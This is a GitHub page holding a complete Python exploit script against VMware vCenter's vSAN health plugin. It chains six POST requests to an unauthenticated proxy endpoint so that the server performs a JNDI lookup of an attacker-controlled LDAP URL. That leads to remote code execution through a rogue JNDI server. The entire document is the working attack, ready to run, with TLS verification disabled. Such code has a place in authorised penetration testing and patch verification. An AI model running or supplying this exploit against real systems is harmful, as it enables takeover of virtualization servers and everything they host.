vcenter_vsan_exploit/exploit.py at main · twosevenzero/vcenter_vsan_exploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
#!/usr/bin/env python3
import click
import requests
import sys
import json
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

@click.command()
@click.argument('host')
@click.argument('payload')
@click.option('--debug', is_flag=True, help='Enable debug messages')
def exploit(host, payload, debug):
    """
    vcenter_vsan_exploit.py 10.10.10.10 ldap://10.10.10.1:1389/o=tomcat
    """
    stage = {
        1: {
            "endpoint": "/setTargetObject",
            "json": json.loads('{"methodInput":[null]}')
        },
        2: {
            "endpoint": "/setStaticMethod",
            "json": json.loads('{"methodInput":["javax.naming.InitialContext.doLookup"]}')
        },
        3: {
            "endpoint": "/setTargetMethod",
            "json": json.loads('{"methodInput":["doLookup"]}')
        },
        4: {
            "endpoint": "/setArguments",
            "json": json.loads('{"methodInput":[["%s"]]}' % payload)
        },
        5: {
            "endpoint": "/prepare",
            "json": json.loads('{"methodInput":[]}')
        },
        6: {
            "endpoint": "/invoke",
            "json": json.loads('{"methodInput":[]}\x0d\x0a')
        }
    }

    do_stage(1, host, stage, debug)
    do_stage(2, host, stage, debug)
    do_stage(3, host, stage, debug)
    do_stage(4, host, stage, debug)
    do_stage(5, host, stage, debug)
    do_stage(6, host, stage, debug)
    print("[!] Exploit Complete. Check Rogue JNDI Server.")
    return()

def do_stage(number, host, stage, debug):
    baseuri = "/ui/h5-vsan/rest/proxy/service/&vsanProviderUtils_setVmodlHelper"
    headers = {'Content-Type': 'application/json', 'User-Agent': 'GPSTest', 'Host': host, 'Connection': 'close'}
    url = 'https://' + host + baseuri + stage[number]['endpoint']

    print("[+] Performing Stage", number, '(', stage[number]['endpoint'] ,') ...')
    try:
        req = requests.post(url=url, json=stage[number]['json'], headers=headers, verify=False)
        if(debug):
            print("[DEBUG] Response: ", req.text)
    except:
        print("[-] HTTP POST Request failed. Aborting.")
        print("[!] Ensure the vCenter host is up and the provided IP/Hostname is correct.")
        sys.exit(1)

if __name__ == '__main__':
    exploit()